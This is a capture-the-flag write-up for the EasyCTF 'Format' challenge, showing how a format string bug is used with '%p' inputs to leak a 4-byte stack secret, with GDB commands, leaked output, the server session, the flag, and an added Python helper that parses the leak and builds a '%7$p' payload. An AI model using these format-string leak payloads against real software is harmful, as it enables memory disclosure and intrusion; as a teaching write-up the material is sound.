EASYCTF - Format
21 Feb 2018
With GDB, we put a breakpoint where the program compares the secret with our input:
0x0000000000400917 <+144>: cmp eax,DWORD PTR [rbp-0x54]
We display the content of the stack with the format string:
Input in GDB (the input file is generated from a shell first, then fed to the program as stdin):
python2 -c "print 'AAAA%p%p%p%p%p%p%p'*30+'\\nAAAA'" > /tmp/f
r < /tmp/f
Output:
0x6d616e2072756f59(nil)(nil)0x7faa168845000x77(nil)0x1013f249000000000x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x257025702570250xc7ae83a318d60c000x7ffce149c7a00x4009900x7ffce149c8880x1004007800x7ffce149c8800x3e8000000000x4009a00x7faa16302f4a(nil)0x7ffce149c8880x1000400000x40093d(nil)0x8b4728e5db7df7420x4007800x7ffce149c880(nil)(nil)
We look at the content of secret, which is at $rbp-0x54:
x/ga $rbp-0x54
0x702570251013f249
The cmp uses eax against a DWORD PTR, so the secret is only 4 bytes wide, while x/g reads 8 bytes starting at the secret. On little-endian x86-64 the secret is therefore the low 32 bits of that value; the high half, 0x70257025, is just "%p%p", the start of our own input buffer sitting right above it.
So the secret is: 1013f249
We look for the secret in the leak from the format string. It is in the 7th %p, 0x1013f24900000000: the 8-byte slot printed there starts at rbp-0x58, so the secret at rbp-0x54 lands in the high 32 bits and the low half is the zeroed 4 bytes below it. The first five %p are the register arguments rsi, rdx, rcx, r8 and r9 under the x86-64 SysV ABI; from the 6th on, printf reads the stack, so the secret is the second stack slot. %7$p would print that slot directly.
We do the same on the server:
user44798@shell:/problems/format$ ./format
Enter your name: %p%p%p%p%p%p%p
Your name is: 0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000
Enter your secret password (in hex)
732581c9
easyctf{p3sky_f0rm4t_s7uff}
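As an added example (not part of the original writeup), here is a small Python script that does the bookkeeping above: it tokenizes the concatenated %p output, picks the 7th value and keeps its high 32 bits, and cross-checks that against the low 32 bits of the x/ga dump. The function names and the position/half parameters are my own choices; the two leak strings are the ones printed earlier on this page, embedded as sample input so the script runs offline.

```python
import re

# Sample input: the two leak lines from the writeup (local GDB run, then the server),
# copied here so the parser runs offline. The string is split only for readability.
LOCAL_LEAK = (
    "0x6d616e2072756f59(nil)(nil)0x7faa168845000x77(nil)0x1013f24900000000"
    "0x70257025702570250x70257025702570250x70257025702570250x7025702570257025"
    "0x70257025702570250x70257025702570250x70257025702570250x7025702570257025"
    "0x257025702570250xc7ae83a318d60c000x7ffce149c7a00x4009900x7ffce149c888"
    "0x1004007800x7ffce149c8800x3e8000000000x4009a00x7faa16302f4a(nil)"
    "0x7ffce149c8880x1000400000x40093d(nil)0x8b4728e5db7df7420x400780"
    "0x7ffce149c880(nil)(nil)"
)
SERVER_LEAK = "0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000"

# glibc's %p prints NULL as "(nil)" and everything else as "0x<hex>". Hex digits never
# contain 'x', so the '0' right before each 'x' unambiguously starts a new token; the
# lazy match plus lookahead stops each value just before the next "0x" or "(nil)".
TOKEN = re.compile(r"\(nil\)|0x[0-9a-f]+?(?=0x|\(nil\)|$)")


def split_leak(leak):
    """Turn concatenated %p output into the list of integers printf emitted."""
    return [0 if tok == "(nil)" else int(tok, 16) for tok in TOKEN.findall(leak)]


def secret_from_leak(leak, position=7, high_half=True):
    """Secret as the hex string the challenge asks for.

    position is the 1-based index of the %p that covers the secret (7 here: five
    register arguments, then the secret sits in the second stack slot). high_half
    selects the upper 32 bits, because the 8-byte slot starts at rbp-0x58 and the
    4-byte secret lives at rbp-0x54.
    """
    qword = split_leak(leak)[position - 1]
    dword = (qword >> 32) if high_half else qword
    return "%x" % (dword & 0xFFFFFFFF)


def secret_from_gdb_dump(qword):
    """Same secret read from 'x/ga $rbp-0x54': the dump starts at the secret itself,
    so the DWORD the cmp uses is the low 32 bits (little-endian)."""
    return "%x" % (qword & 0xFFFFFFFF)


def leak_format(position=7):
    """Direct-parameter form of the leak: %7$p prints only the slot we care about."""
    return "%%%d$p" % position


if __name__ == "__main__":
    # Assumption: the GDB dump value is the one shown in the writeup.
    gdb_value = 0x702570251013f249
    print("local secret from leak :", secret_from_leak(LOCAL_LEAK))
    print("local secret from gdb  :", secret_from_gdb_dump(gdb_value))
    print("server secret from leak:", secret_from_leak(SERVER_LEAK))
    print("shorter payload        :", leak_format(7))
```

Both routes agree on 1013f249 locally, and the same slot on the server gives 732581c9, the value typed in above.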